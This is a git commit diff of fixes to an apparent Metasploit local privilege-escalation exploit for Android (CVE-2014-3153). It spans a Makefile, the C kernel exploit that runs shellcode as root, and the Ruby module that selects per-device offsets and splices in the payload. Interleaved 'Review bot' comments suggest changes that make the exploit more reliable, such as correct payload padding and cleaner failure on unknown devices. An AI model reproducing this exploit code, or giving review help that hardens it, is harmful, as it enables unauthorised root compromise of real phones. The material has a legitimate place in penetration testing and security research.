more fixes
parent
e6d4c0001c
commit
f1efa760df
|
@ -2,7 +2,7 @@
|
|||
all: install
|
||||
|
||||
build:
|
||||
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
|
||||
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi
|
||||
|
||||
install: build
|
||||
mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2014-3153.so
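Review bot: The targets in this hunk (`all`, `build`, `install`) are not declared phony anywhere visible, so a stray file named `build` or `install` in the module directory makes `make install` skip the ndk-build step and silently re-install whatever `libs/armeabi/libexploit.so` happens to exist; line 1 of the Makefile is outside the hunk, so disregard this if it already holds `.PHONY: all build install`. Otherwise add `.PHONY: all build install` above `all: install`. The `mv` also hard-codes `libs/armeabi/`, which only matches because of the added `APP_ABI=armeabi`, so the two must stay in sync if another ABI is ever built.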
@ -1,4 +1,3 @@
|
|||
#include <android/log.h>
|
||||
#include <unistd.h>
|
||||
#include <linux/futex.h>
|
||||
#include <pthread.h>
|
||||
|
@ -12,6 +11,7 @@
|
|||
#include <sys/system_properties.h>
|
||||
#include <sys/mount.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/uio.h>
|
||||
#include <limits.h>
|
||||
|
@ -56,12 +56,12 @@ int run_shellcode_as_root() {
|
|||
int uid = getuid();
|
||||
if (uid != 0) {
|
||||
LOGV("Not uid=%d, returning\n", uid);
|
||||
return;
|
||||
return 0;
|
||||
}
|
||||
|
||||
if (shellcode_buf[0] == 0x90) {
|
||||
LOGV("No shellcode, uid=%d\n", uid);
|
||||
return;
|
||||
return 0;
|
||||
}
|
||||
LOGV("running shellcode, uid=%d\n", uid);
|
||||
|
||||
|
@ -71,7 +71,7 @@ int run_shellcode_as_root() {
|
|||
LOGV("shellcode, pid=%d, tid=%d\n", getpid(), gettid());
|
||||
void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
|
||||
if (ptr == MAP_FAILED) {
|
||||
return;
|
||||
return 0;
|
||||
}
|
||||
memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
|
||||
void (*shellcode)() = (void(*)())ptr;
|
||||
|
@ -836,14 +836,14 @@ void *make_action_adding_waiter(void *arg) {
|
|||
|
||||
// Handler to hack in the kernel.
|
||||
act.sa_handler = hack_the_kernel;
|
||||
act.sa_mask = 0;
|
||||
sigemptyset(&act.sa_mask);
|
||||
act.sa_flags = 0;
|
||||
act.sa_restorer = NULL;
|
||||
sigaction(12, &act, NULL);
|
||||
|
||||
// Handler to kill useless threads.
|
||||
act3.sa_handler = thread_killer;
|
||||
act3.sa_mask = 0;
|
||||
sigemptyset(&act3.sa_mask);
|
||||
act3.sa_flags = 0;
|
||||
act3.sa_restorer = NULL;
|
||||
sigaction(14, &act3, NULL);
|
||||
|
@ -947,7 +947,7 @@ void *stack_modifier(void *name)
|
|||
|
||||
// Register an handle for a signal. We will use it to kill this thread later.
|
||||
act3.sa_handler = thread_killer;
|
||||
act3.sa_mask = 0;
|
||||
sigemptyset(&act3.sa_mask);
|
||||
act3.sa_flags = 0;
|
||||
act3.sa_restorer = NULL;
|
||||
sigaction(14, &act3, NULL);
|
||||
|
@ -1018,6 +1018,7 @@ void *stack_modifier(void *name)
|
|||
}
|
||||
LOGD("[STACK MODIFIER] Leaving\n");
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
|
||||
|
@ -1127,7 +1128,7 @@ void *trigger(void *arg) {
|
|||
if (*((unsigned long *)hacked_node) == readval) {
|
||||
LOGD("[TRIGGER] Device seems to be patched.\n");
|
||||
send_pipe_msg(ERROR);
|
||||
return;
|
||||
return 0;
|
||||
}
|
||||
|
||||
// Save the waiter address
|
||||
|
@ -1280,6 +1281,7 @@ void *trigger(void *arg) {
|
|||
}
|
||||
}
|
||||
stop_for_error();
|
||||
return NULL;
|
||||
}
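Review bot: The signal registrations in the make_action_adding_waiter hunk still use bare numbers and discard the result: `sigaction(12, &act, NULL)` and `sigaction(14, &act3, NULL)` (12 and 14 are SIGUSR2 and SIGALRM on Linux/ARM), and the same pattern recurs in the stack_modifier hunk. Replacing `act.sa_mask = 0` with `sigemptyset(&act.sa_mask)` is the right fix for the mask, but if the `struct sigaction` objects are declared outside the hunk without `= {0}`, any field not assigned here stays uninitialized. I would write `if (sigaction(SIGUSR2, &act, NULL) != 0) LOGD("sigaction(SIGUSR2) failed, errno=%d\n", errno);` and the same for `SIGALRM`/`act3`, assuming `<signal.h>` and `<errno.h>` are among the includes not shown, so a failed registration is reported before the thread-killer path is relied upon. Both functions begin outside their hunks.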
@ -95,7 +95,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
target_index = 1 #default
|
||||
if target['auto']
|
||||
product = cmd_exec("getprop ro.build.product")
|
||||
fingerprint = cmd_exec("getprop ro.build.fingerprint")
|
||||
|
@ -114,28 +113,31 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
"D2303",
|
||||
"cancro",
|
||||
].include? product
|
||||
target_index = 1
|
||||
my_target = targets[1] # Default
|
||||
elsif [
|
||||
"klte",
|
||||
"jflte",
|
||||
].include? product
|
||||
target_index = 2 # New Samsung
|
||||
my_target = targets[2] # New Samsung
|
||||
elsif [
|
||||
"t03g",
|
||||
"m0",
|
||||
].include? product
|
||||
target_index = 3 # Old Samsung
|
||||
my_target = targets[3] # Old Samsung
|
||||
elsif [
|
||||
"baffinlite",
|
||||
"Vodafone_785",
|
||||
].include? product
|
||||
target_index = 4 # Samsung Grand
|
||||
my_target = targets[4] # Samsung Grand
|
||||
else
|
||||
print_status("Could not automatically target #{product}")
|
||||
my_target = targets[1] # Default
|
||||
end
|
||||
else
|
||||
my_target = target
|
||||
end
|
||||
|
||||
print_status("Using target: #{targets[target_index].name}")
|
||||
print_status("Using target: #{my_target.name}")
|
||||
|
||||
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.so" )
|
||||
exploit_data = File.read(local_file, {:mode => 'rb'})
|
||||
|
@ -146,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
|
||||
|
||||
# Apply the target config
|
||||
offsets = targets[target_index].opts
|
||||
offsets = my_target.opts
|
||||
config_buf = [
|
||||
offsets['new_samsung'] ? -1 : 0,
|
||||
offsets['iovstack'].to_i,
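Review bot: In the auto-targeting branch, an unrecognized `ro.build.product` only prints a status and then silently proceeds with `my_target = targets[1] # Default` in the final `else`; for a kernel exploit that applies per-target offsets, wrong offsets are more likely to hang or reboot the device than to fail cleanly. Unless the default offsets are known to be safe on arbitrary devices, I would stop there with `fail_with(Failure::NoTarget, "Could not automatically target #{product}; select a target explicitly")` and leave the default to users who choose it. `getprop` output may also carry a trailing newline, so `.include? product` only matches if cmd_exec already strips it; a `.strip` on the result is cheap insurance. Separately, the splice on the `exploit_data.gsub!` line assumes `payload_encoded.length == space`: if the encoded payload is not NOP-padded to exactly `space` (for example with `DisableNops` set), `"\x90" * (payload_encoded.length - space)` gets a negative count and raises, and `space - payload_encoded.length` is the form that pads correctly. `exploit` continues past the end of this hunk, and `space`/`payload_encoded` are defined between the hunks.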